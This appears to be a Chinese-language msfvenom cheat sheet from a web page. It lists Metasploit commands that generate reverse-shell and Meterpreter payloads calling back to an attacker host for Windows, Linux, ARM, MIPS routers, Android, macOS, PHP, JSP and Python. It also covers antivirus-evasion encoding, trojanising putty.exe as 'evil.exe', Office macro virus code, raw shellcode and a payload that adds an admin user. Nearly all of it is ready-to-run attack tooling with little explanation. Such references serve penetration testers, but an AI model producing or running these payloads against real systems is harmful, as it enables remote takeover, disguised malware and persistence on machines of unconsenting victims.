Msfvenom Cheatsheet
精选 50+ 条 Metasploit 框架下的 Payload 生成命令,涵盖各种平台与高级绕过技巧。
基础查询 (Query)
列出所有可用 Payload
msfvenom -l payloads 列出所有编码器 (Encoders)
msfvenom -l encoders 列出所有支持的输出格式
msfvenom -l formats 列出所有支持的平台
msfvenom -l platforms 查看特定 Payload 的详细配置参数
msfvenom -p <payload> --list-options 查看完整帮助信息
msfvenom --help Windows 常用反弹壳
经典 x86 Stageless Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe Windows x64 Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell64.exe HTTPS 加密通道 (绕过流量审计)
msfvenom -p windows/meterpreter/reverse_https LHOST=<IP> LPORT=443 -f exe > https.exe 普通 CMD 反弹 (体积小)
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe 纯 PowerShell 反弹脚本
msfvenom -p windows/powershell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f psh > rev.ps1 使用 Shikata_ga_nai 编码 5 次
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe Linux 常用反弹壳
Linux x86 Meterpreter
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf Linux x64 Meterpreter
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell64.elf Linux x64 普通 Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf ARM64 (树莓派/移动设备) Meterpreter
msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf MIPSLE (路由器/嵌入式) Meterpreter
msfvenom -p linux/mipsle/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf 脚本语言 / Web 壳
PHP Meterpreter (Web 上传)
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php 原生 PHP 反弹 Shell
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > rev.php Java JSP 反弹 Shell (WAR 包)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war Python 反弹 Meterpreter
msfvenom -p python/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.py Windows PowerShell 反弹 BAT
msfvenom -p cmd/windows/reverse_powershell LHOST=<IP> LPORT=<PORT> -f raw > rev.bat 免杀与高级技巧
去除坏字符 (如空字节)
msfvenom ... -b '\x00\xff' 指定退出方式 (thread/process/seh)
msfvenom ... EXITFUNC=thread 绑定到现有可执行文件 (如 Putty)
msfvenom -p windows/meterpreter/reverse_tcp -x putty.exe -k -f exe > evil.exe 生成反射注入用的 DLL
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > meter.dll 生成 Office 宏病毒 (VBA) 代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f vba 生成 C 语言格式的 Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f c 其他实用 Payload
Android APK 控端
msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o app.apk MacOS Mach-O 反弹 Meterpreter
msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f macho > shell.macho Windows 添加管理员用户
msfvenom -p windows/adduser USER=admin PASS=123456 -f exe > adduser.exe 测试用的消息弹窗 Payload
msfvenom -p windows/messagebox TEXT="Hacked!" -f exe > msg.exe 未找到相关命令
试试搜索其他关键字,如 "windows" 或 "reverse"。